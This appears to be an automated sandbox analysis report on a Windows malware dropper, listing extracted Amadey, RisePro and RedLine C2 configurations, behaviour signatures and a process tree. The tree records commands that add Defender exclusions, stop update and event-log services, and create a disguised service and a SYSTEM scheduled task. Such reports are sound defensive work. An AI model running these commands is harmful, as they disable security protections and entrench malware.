Overview

overview

10

Static

static

7

0922dbdd3f...cs.exe

windows7-x64

10

0922dbdd3f...cs.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    53s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 05:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe

  • Size

    1.5MB

  • MD5

    5f6cc5c2a02f480d65ac2d5099c817a2

  • SHA1

    a84798a529637c82abf7611e7da43c2d56132223

  • SHA256

    0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2

  • SHA512

    892f44fb92cc3c085e98c31f0b6b68d7a78884181678932f9f359089108acbc6e3b833e0970412b8387cd4bfa1af976d7c13fa24ec71e5e8a13be8ed8eaf39b3

  • SSDEEP

    49152:ip5jP5asMvTwIzd5Llb+LuOhY+ZVZN8we/V:g53InzHLlanhpZ58wet

Score
10/10
amadeyprivateloaderredlinerisepro118befcc767c0bootkitevasionexecutioninfostealerloaderpersistencestealerthemidatrojan

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

C2

http://5.42.96.141

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Modifies firewall policy service 2 TTPs 1 IoCs
    evasion
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

    stealerrisepro
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 38 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 61 IoCs
  • Themida packer 31 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 33 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:2452
        • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2880
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2180
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2764
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 96
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:488
            • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              PID:808
            • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
              "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:2260
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2552
                • C:\Windows\SysWOW64\sc.exe
                  Sc stop GameServerClient
                  7⤵
                  • Launches sc.exe
                  PID:2636
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService remove GameServerClient confirm
                  7⤵
                  • Executes dropped EXE
                  PID:2192
                • C:\Windows\SysWOW64\sc.exe
                  Sc delete GameSyncLink
                  7⤵
                  • Launches sc.exe
                  PID:2628
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService remove GameSyncLink confirm
                  7⤵
                  • Executes dropped EXE
                  PID:1980
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2624
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService start GameSyncLink
                  7⤵
                  • Executes dropped EXE
                  PID:2556
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                6⤵
                  PID:888
                  • C:\Windows\SysWOW64\sc.exe
                    Sc stop GameServerClientC
                    7⤵
                    • Launches sc.exe
                    PID:2232
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameServerClientC confirm
                    7⤵
                    • Executes dropped EXE
                    PID:2240
                  • C:\Windows\SysWOW64\sc.exe
                    Sc delete PiercingNetLink
                    7⤵
                    • Launches sc.exe
                    PID:2408
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove PiercingNetLink confirm
                    7⤵
                    • Executes dropped EXE
                    PID:2436
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2216
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService start PiercingNetLink
                    7⤵
                    • Executes dropped EXE
                    PID:2228
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                  6⤵
                    PID:472
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete GameSyncLinks
                      7⤵
                      • Launches sc.exe
                      PID:932
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameSyncLinks confirm
                      7⤵
                      • Executes dropped EXE
                      PID:1520
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:1012
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start GameSyncLinks
                      7⤵
                      • Executes dropped EXE
                      PID:1128
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                    6⤵
                      PID:2332
                  • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2700
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 96
                      6⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2772
                  • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                    5⤵
                    • UAC bypass
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    • System policy modification
                    PID:2060
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2588
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                      6⤵
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2424
                      • C:\Users\Admin\Pictures\oNqPE9PHMgA7eaKzT63BcN1N.exe
                        "C:\Users\Admin\Pictures\oNqPE9PHMgA7eaKzT63BcN1N.exe" /s
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Writes to the Master Boot Record (MBR)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2888
                        • C:\Users\Admin\Pictures\360TS_Setup.exe
                          "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
                          8⤵
                            PID:3188
                            • C:\Program Files (x86)\1716277521_0\360TS_Setup.exe
                              "C:\Program Files (x86)\1716277521_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
                              9⤵
                                PID:3832
                          • C:\Users\Admin\Pictures\TdKAq2r6YWficbH1Cbq6I4oo.exe
                            "C:\Users\Admin\Pictures\TdKAq2r6YWficbH1Cbq6I4oo.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:1832
                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                              8⤵
                              • Command and Scripting Interpreter: PowerShell
                              PID:2752
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                              8⤵
                                PID:2288
                                • C:\Windows\system32\wusa.exe
                                  wusa /uninstall /kb:890830 /quiet /norestart
                                  9⤵
                                    PID:2436
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop UsoSvc
                                  8⤵
                                  • Launches sc.exe
                                  PID:2420
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                  8⤵
                                  • Launches sc.exe
                                  PID:2992
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop wuauserv
                                  8⤵
                                  • Launches sc.exe
                                  PID:2212
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop bits
                                  8⤵
                                  • Launches sc.exe
                                  PID:1812
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop dosvc
                                  8⤵
                                  • Launches sc.exe
                                  PID:1720
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                  8⤵
                                    PID:1612
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                    8⤵
                                      PID:1560
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      8⤵
                                        PID:2296
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        8⤵
                                          PID:3020
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1692
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1364
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop eventlog
                                          8⤵
                                          • Launches sc.exe
                                          PID:2220
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1580
                                      • C:\Users\Admin\Pictures\rMK6lP8pCPR2ZN98wR3VYof4.exe
                                        "C:\Users\Admin\Pictures\rMK6lP8pCPR2ZN98wR3VYof4.exe"
                                        7⤵
                                        • Modifies firewall policy service
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies system certificate store
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2064
                                      • C:\Users\Admin\Pictures\dUyzkvVWSie4yYqhTWgCXSqI.exe
                                        "C:\Users\Admin\Pictures\dUyzkvVWSie4yYqhTWgCXSqI.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2256
                                        • C:\Users\Admin\AppData\Local\Temp\7zSD76B.tmp\Install.exe
                                          .\Install.exe /IjiHdidVaJ "385118" /S
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:600
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            9⤵
                                              PID:1364
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                10⤵
                                                  PID:1020
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    11⤵
                                                      PID:1720
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                        12⤵
                                                          PID:1304
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                      10⤵
                                                        PID:2556
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                          11⤵
                                                            PID:888
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                              12⤵
                                                                PID:1380
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                            10⤵
                                                              PID:1248
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                11⤵
                                                                  PID:852
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                    12⤵
                                                                      PID:1560
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                  10⤵
                                                                    PID:2416
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                      11⤵
                                                                        PID:2220
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                          12⤵
                                                                            PID:2604
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        10⤵
                                                                          PID:1376
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                            11⤵
                                                                              PID:2904
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                12⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:2208
                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  13⤵
                                                                                    PID:1284
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                            9⤵
                                                                              PID:3020
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                10⤵
                                                                                  PID:2216
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    11⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:1956
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      12⤵
                                                                                        PID:1364
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\WHCnicp.exe\" it /rDOdidrxts 385118 /S" /V1 /F
                                                                                  9⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1376
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                  9⤵
                                                                                    PID:2656
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                      10⤵
                                                                                        PID:3020
                                                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                          11⤵
                                                                                            PID:2288
                                                                                  • C:\Users\Admin\Pictures\4kHHGWOLVZBMAhFwvzfLRphC.exe
                                                                                    "C:\Users\Admin\Pictures\4kHHGWOLVZBMAhFwvzfLRphC.exe"
                                                                                    7⤵
                                                                                      PID:2548
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSB47.tmp\Install.exe
                                                                                        .\Install.exe /IjiHdidVaJ "385118" /S
                                                                                        8⤵
                                                                                          PID:1012
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            9⤵
                                                                                              PID:448
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                10⤵
                                                                                                  PID:2408
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                    11⤵
                                                                                                      PID:1960
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                        12⤵
                                                                                                          PID:1752
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                      10⤵
                                                                                                        PID:1048
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                          11⤵
                                                                                                            PID:864
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                              12⤵
                                                                                                                PID:2844
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                            10⤵
                                                                                                              PID:1376
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                11⤵
                                                                                                                  PID:2364
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                    12⤵
                                                                                                                      PID:996
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                  10⤵
                                                                                                                    PID:3020
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                      11⤵
                                                                                                                        PID:1956
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
